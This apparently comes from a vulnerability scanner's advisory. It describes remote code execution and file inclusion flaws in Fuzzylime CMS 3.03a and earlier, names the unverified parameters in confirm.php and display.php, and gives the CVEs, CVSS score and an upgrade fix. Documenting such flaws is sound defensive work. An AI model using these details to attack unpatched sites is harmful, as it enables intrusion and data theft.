Summary
This host is installed with Fuzyylime(cms) which is prone to Remote Code Execution vulnerability.
Impact
Successful exploitation will allow attacker to include and execute arbitrary files from local and external resources, and can gain sensitive information about remote system directories when magic_quotes_gpc is disabled.
Impact level: Application/System
Solution
Upgrade to fuzzylime 3.03b or later,
For updates refer to http://cms.fuzzylime.co.uk/st/content/download
Insight
The flaws are due to,
- The data passed into 'list' parameter in code/confirm.php and to the 'template' parameter in code/display.php is not properly verified before being used to include files.
- Input passed to the 's' parameter in code/display.php is not properly verified before being used to write to a file.
Affected
Fuzyylime(cms) version 3.03a and prior.
References
Updated on 2017-03-28
Severity
Classification
-
CVE CVE-2009-2176, CVE-2009-2177 -
CVSS Base Score: 7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related Vulnerabilities
- AlienVault OSSIM 'date_from' Parameter Multiple SQL Injection Vulnerabilities
- ASP Inline Corporate Calendar SQL injection
- A-A-S Application Access Server Multiple Vulnerabilities
- ActualAnalyzer Lite 'ant' Cookie Parameter Remote Command Execution Vulnerability
- AjaXplorer zoho plugin Directory Traversal Vulnerability